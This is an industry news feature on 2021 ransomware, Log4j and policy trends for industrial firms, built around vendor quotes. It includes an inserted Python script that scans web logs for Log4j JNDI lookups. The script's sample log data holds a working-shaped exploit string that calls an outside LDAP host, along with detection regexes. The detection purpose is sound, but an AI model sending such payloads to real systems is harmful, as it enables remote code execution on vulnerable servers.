Widening threat landscape brings a multitude of challenges to industrial, manufacturing enterprises


The year 2021 has seen a wide range of cybersecurity incidents that have affected industrial and manufacturing enterprises. Adversaries have exploited these organizations using several techniques, including directly or indirectly launching ransomware and malware attacks, exploiting hardware vulnerabilities, and targeting other security gaps.

As we gathered from the first part of this series, ransomware offensives have risen to become the key threat to national security, with continuous attacks launched against businesses, including government, healthcare, and across the critical infrastructure sector. Supply chain cyberattacks are expected to quadruple in 2021 compared to last year, resulting in downtime of systems, monetary loss, and reputational damage. For industrial and manufacturing enterprises, the biggest cyber threat is a lack of knowledge and training. Often, management is not even fully aware of the risks, and most employees have little to no training regarding how to identify and avoid potential threats.

The increased impact and scale of ransomware operations from 2019 to 2021 has been largely fueled by the growth of the Ransomware-as-a-Service (RaaS) business model, by which developers sell or lease ransomware to other cybercriminals, the Canadian Centre for Cyber Security observed in recent data. 

Known ransom payments, after increasing rapidly from 2019 to 2020, appear to have stabilized around $200,000 in 2021, down slightly from 2020 levels, according to the Cyber Centre, Canada’s authority on cyber security. “At the same time, in 2021, the global average total cost of recovery from a ransomware incident (i.e., the cost of paying the ransom and/or remediating the compromised network) has more than doubled this year, increasing from $970,722 CAD in 2020 to $2.3M CAD in 2021,” it added.

Close to the end of the year, industrial and manufacturing enterprises find themselves coping with rising cyber risks caused by the Apache Log4j series of vulnerabilities. The exploitation of one of these vulnerabilities allows an unauthenticated attacker to remotely execute code on a server. Successful exploitation can occur even if the software accepting data input is not written in Java; such software can pass malicious strings to other (back end) systems that are written in Java. 

The Apache Software Foundation (ASF) released another patch, version 2.17.0, on Friday, as the initial Log4j vulnerability, tracked as CVE-2021-44228, has been abused by all kinds of threat actors, ranging from state-backed hackers to ransomware gangs and others who inject Monero miners on vulnerable systems.
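The passage above makes the point that a non-Java front end can forward a malicious string into a Java back end that logs it with Log4j. One practical defender's check is to scan the front end's own access logs for the lookup syntax that triggers CVE-2021-44228, so that attempts are visible even where the vulnerable component sits several hops away. The following Python is an added example, not code from the article or from any vendor quoted in it; it assumes the logs are in the common "combined" web-server format and runs over constructed sample lines (the IP addresses are from the documentation ranges). It is a detection aid only: the remedy for the vulnerability is upgrading to the fixed Log4j release.

```python
import re
from typing import Dict, List

# Constructed sample web-server access-log lines (not from the article).
# Line 3 carries a Log4j JNDI lookup in the User-Agent field, line 4 a
# non-JNDI lookup string; lines 1 and 2 are benign.
SAMPLE_LOG_LINES: List[str] = [
    '203.0.113.10 - - [20/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [20/Dec/2021:10:01:05 +0000] "GET /api/status HTTP/1.1" 200 87 "-" "curl/7.79.1"',
    '203.0.113.12 - - [20/Dec/2021:10:01:09 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://198.51.100.7/a}"',
    '203.0.113.13 - - [20/Dec/2021:10:01:12 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${env:HOSTNAME}"',
]

# A JNDI lookup anywhere in attacker-controlled input is the CVE-2021-44228
# trigger shape; matched case-insensitively so a mixed-case prefix is not missed.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Any "${prefix:...}" lookup in a request field is suspicious in its own right:
# a legitimate client has no reason to send Log4j lookup syntax at all.
ANY_LOOKUP = re.compile(r"\$\{[^}]*:[^}]*\}")

# Combined log format (client, timestamp, request line, status, size,
# referrer, user-agent); these are the fields a non-Java front end forwards.
COMBINED = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referrer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def classify_line(line: str) -> Dict[str, str]:
    """Return the field and severity of the first suspicious lookup in a line.

    Lines that do not parse as combined format are inspected as one raw field,
    so malformed or truncated lines are still checked rather than skipped.
    """
    match = COMBINED.match(line)
    fields = match.groupdict() if match else {"raw": line}
    for name, value in fields.items():
        if JNDI_LOOKUP.search(value):
            return {"field": name, "severity": "high"}
        if ANY_LOOKUP.search(value):
            return {"field": name, "severity": "medium"}
    return {"field": "", "severity": "none"}


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Scan log lines and return one finding per suspicious line."""
    findings: List[Dict[str, str]] = []
    for number, line in enumerate(lines, start=1):
        verdict = classify_line(line)
        if verdict["severity"] != "none":
            findings.append({"line": str(number), **verdict})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG_LINES):
        print(f"line {finding['line']}: {finding['severity']} severity "
              f"lookup in field '{finding['field']}'")
```

Run against the constructed lines, the scan flags line 3 as high severity and line 4 as medium severity, both in the user-agent field. The medium tier exists because attackers rarely send only the textbook string; treating any lookup syntax in client-supplied fields as worth a look keeps the rule useful without trying to enumerate every variant.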

In the second part of the series on the key cybersecurity trends that faced both industrial and manufacturing enterprises in 2021, Industrial Cyber dives into the effect of the various legislative and executive initiatives that the U.S. administration made during the year. We will also look into how the threat of ransomware changed qualitatively and quantitatively in 2021 for industrial and manufacturing enterprises, and at what the focus security areas for industrial and manufacturing enterprises were in 2021.

Jason Drewniak is the Vice President of Marketing and Business Development at Garland Technology

Addressing the numerous moves announced by the U.S. administration to deal with the rising threat landscape over the course of the year, Jason Drewniak, vice president for marketing and business development at Garland Technology, said that the U.S. government has recognized the urgency in protecting critical infrastructures in ICS and OT environments. “The legislative and executive initiatives are jump-starting long-overdue conversations among various stakeholders leading to an effective blueprint to strengthen organizations’ readiness for ICS and OT cyber threats,” he told Industrial Cyber.

Many of the discussions the Garland Technology team is having with ICS and OT customers turn to the topic of President Joe Biden’s Executive Order on ‘Improving the Nation’s Cybersecurity’ (14028), according to Drewniak. “Everyone is closely watching what recommendations and requirements result from the President’s directive. As a trusted partner in the industry, we want to stay informed of these fast-moving developments,” he added.

Jeff Cornelius, EVP, Cyber-Physical Security

While the legislative and executive initiatives announced by the US government concerning ICS and OT are a major step in the right direction, they are only a first step toward truly robust industrial cyber defense, Jeff Cornelius, EVP for cyber-physical security at Darktrace, told Industrial Cyber. “Most of these regulations have a heavy focus on vulnerability tracking and patching. But the reality is that a) most ICS/OT vulnerabilities have no practical mitigation advice and b) sophisticated ICS/OT attacks often exploit zero days (e.g., Log4J before its disclosure).” 

The reality of both unknown and un-patchable vulnerabilities, as well as unseen points of IT/OT convergence, means that attackers can still slip into even the most rigorously patched environment, according to Cornelius. “And so, rather than merely focusing on patching the perimeter, organizations need to turn their attention to post-exploitation tactics, that is, identify even the most subtle forms of unusual behavior and neutralizing emerging attacks at their earliest stages,” he added.

Analyzing how these legislative and executive initiatives of the administration helped ICS and OT environments to identify and improve their security gaps, Chris Sistrunk, technical manager at Mandiant ICS Consulting, told Industrial Cyber that “these security gaps have been known for a long while, but largely never been addressed at scale until now. Because they either were not a victim or they weren’t forced to improve their ICS/OT security by government regulations.”

Chris Sistrunk, technical manager at Mandiant ICS Consulting

“Critical Pipeline owners now have had to address these issues because of the two TSA Security Directives this year, and also Transportation/Rail as well as of a week or so ago,” Sistrunk added.

Assessing whether the threat of ransomware changed qualitatively and quantitatively in 2021 for industrial and manufacturing enterprises, Daniel Zafra, manager for intelligence analysis at Mandiant, told Industrial Cyber that ransomware threat actors have evolved their tactics and want to extort rich companies that are willing to pay, which have included companies that have ICS/OT systems to make or deliver their products. “Ransomware has changed both qualitatively and quantitatively,” he added.

“Qualitatively, through the last two years, we observed ransomware operators evolve from utilizing a ‘shotgun’ approach, which impacts multiple random victims, to a post-compromise approach,” according to Zafra. “This entails casting a wide net to then target organizations using a variety of techniques through the lifecycle. Lastly, ransomware operators increased the chances of receiving a ransom payment by extorting victims (i.e., the operator threatens to post the victim’s data if they do not pay a ransom).”

“Quantitatively, the number of ransomware incidents we tracked based on data exposed from these extortion leaks increased from ~1.5K in 2020 to over 2.5K in 2021. The actual number of incidents is likely even higher than what we observed by tracking these numbers,” Zafra added.

Daniel Zafra, manager for intelligence analysis at Mandiant

The threat of ransomware to industrial and manufacturing enterprises has indeed changed quantitatively, with attacks against these sectors rising along with the rise in ransomware more broadly, Cornelius said. “However, the Colonial Pipeline and JBS Foods ransomware events have foregrounded aspects of industrial security that have posed major risks for years, but largely went unattended to—namely, the threat that IT attacks pose to OT systems. And so, qualitatively, we are seeing more publicly known attacks ‘spill over’ from IT to OT (JBS Foods), and OT systems being manually shut down to avoid this spillover (Colonial Pipeline),” he added.

In ransomware strains like EKANS, “we see the attack directly targeting ICS processes in its kill chain. However, this is a minority of ransomware strains affecting industrial environments; the reality is that IT attacks are increasingly affecting OT, either directly or indirectly,” according to Cornelius. 

A focus on securing OT in a siloed capacity is thus insufficient to defend against cyber-attacks targeting industrial environments, especially fast-moving attacks like ransomware that can spread laterally very stealthily, Cornelius said. “What attacks like this show us is that we need unified protection of IT and OT—ideally by a technology that can understand the complexities of both environments, and also illuminate any points of convergence between the two,” he added.

Drewniak said that threats like ransomware are always evolving as bad actors try to find vulnerabilities to incapacitate critical infrastructures. “In project discussions with customers, we encounter questions about NIST and their proposed Cyber Security Framework Profile for Ransomware Management (NISTIR 8374). This framework provides an actionable roadmap to help organizations respond to and reduce their susceptibility to ransomware attacks,” he added.

Exploring the focus security areas for industrial and manufacturing enterprises in 2021, Drewniak noted that OT systems are becoming more complex, with a variety of devices, remote connections, and geographically distributed facilities, which makes protecting them more complex as well. While firewalls have long been the bedrock for segmenting OT networks, he said, there is a use case for data diodes alongside firewalls, as well as for the Data Diode TAP variation.

“Data diodes are also a security barrier system, but one that enforces a physical separation between network segments using one-way data transfer protocols, designed to eliminate back door attacks or breaches,” according to Drewniak. “Data diodes provide a physical and electrical separation layer, designed to pass one-way traffic between segments to eliminate attack risks.”

Data Diode TAPs typically send unidirectional ‘copies’ of the traffic to security monitoring tools, Drewniak added. “Data Diode TAPs are purpose-built ‘unintelligent’ hardware devices, whose circuitry physically doesn’t have the monitoring ports connected back to the network, rendering bidirectional traffic impossible and ensuring security tools or destinations are isolated from the network segment,” he said.

As industrial and manufacturing companies modernize their technological environments, they need to embrace sufficiently modern security strategies, according to Cornelius. “Yes—identifying assets, identifying vulnerabilities, and trying to patch them (when possible) all are important. But this is necessary, not sufficient,” he added. 

As industrial and manufacturing companies embrace remote connections and more advanced devices such as IIoT, and as their environments become more complex generally, AI provides an ideal technology for understanding these complexities and evolutions, Cornelius pointed out. “AI can process massive amounts of data, cutting through the noise to spot truly threatening behavior as it occurs in real-time. OT/ICS security focuses have been stuck in the past for decades. It is time to bring them up to date with the 21st century,” he added.

“Every industrial company that is improving their security is doing it differently since their networks and ICS/OT systems are all engineered differently (e.g., built in different years, using different ICS vendors, different applications, etc.). Many are focusing on raising security awareness and focusing on hardening the ingress/egress points into ICS/OT networks,” Zafra said. Based on Mandiant’s experience of responding to and researching ransomware operations, the ransomware family used by the actor normally does not determine the severity of the impact of an incident, he added.

“Given that most ransomware intrusions are adapted to work within the target environment, the impacts depend on both the victim’s overall security and the actor’s choices during the attack,” according to Zafra. “For this reason, we suggest organizations focus on early prevention, hunting, and detection of ransomware activity by acquiring and operationalizing up-to-date information on active threat clusters and their behaviors from sources such as threat intelligence publications, information sharing groups, and other open-source research,” he added.

Year-over-year, there was a 70 percent increase in manufacturing organizations appearing on ransomware data leak sites, Kimberly Goody, director of financial crime analysis at Mandiant, told Industrial Cyber. 

Kimberly Goody, director of financial crime analysis at Mandiant

“Comparing H1 2021 to H2 2021, there was a 25% increase in the number of manufacturing organizations appearing on these sites. Overall, the threat of multi-faceted extortion attacks has increased to all organizations,” according to Goody. “Threat actors deploying ransomware have increasingly improved their capabilities and methodology allowing them to conduct a greater number of attacks and expand their impact at a single victim. The outsourcing of operational phases to other threat actors, such as gaining initial access to victims, has helped facilitate this as it allows them to specialize,” she added.

A recent Kaspersky report found signs of compromise in many organizations on computers directly related to ICS and said that the identified trends will not only continue but gain new traction in the coming year. Evaluating whether industrial and manufacturing enterprises are prepared for such intrusions, Drewniak said that adequate protection requires organizations to deploy the right asset management, threat detection, and response tools.

“Today, gaining full asset visibility for discovery and management begins with 100% packet visibility, afforded by network TAPs. Relying on switch SPAN ports is not going to cut it in today’s environment, as they were not designed for continuous monitoring,” he added. 

By contrast, a network TAP is a purpose-built hardware device that allows you to access and monitor your network traffic by copying packets without impacting or compromising network integrity, according to Drewniak. “The TAP allows network traffic to flow between its network ports without interruption, creating an exact copy of both sides of the traffic flow, continuously 24×7. The duplicate copies are then used for monitoring and security analysis, making network TAPs the foundation of a solid cyber security strategy,” he added.

Many industrial organizations are not ready for the new wave of attacks, nor are they often even aware of present vulnerabilities and active threats existing within their environments, according to Cornelius. “And so, broadly speaking, industrial and manufacturing organizations are not prepared.” 

The good news, however, is that sophisticated technologies are readily available to defend these organizations, Cornelius said. “With major OT/ICS security events this past year, it is no longer possible to ignore the threat. It is just a question of these organizations being willing to invest in the most robust security technologies on the market, rather than focus on achieving the lowest common denominator of industrial security,” he added.

Sistrunk said he “would agree that ransomware threat actors will continue to evolve tactics and tools. Largely, I would say the industrial and manufacturing orgs that have to meet government regulations like electric sector, nuclear, critical pipelines, critical chemicals will be more prepared than the ones that aren’t regulated or that don’t have any focus on an ICS Security Program,” he concluded.
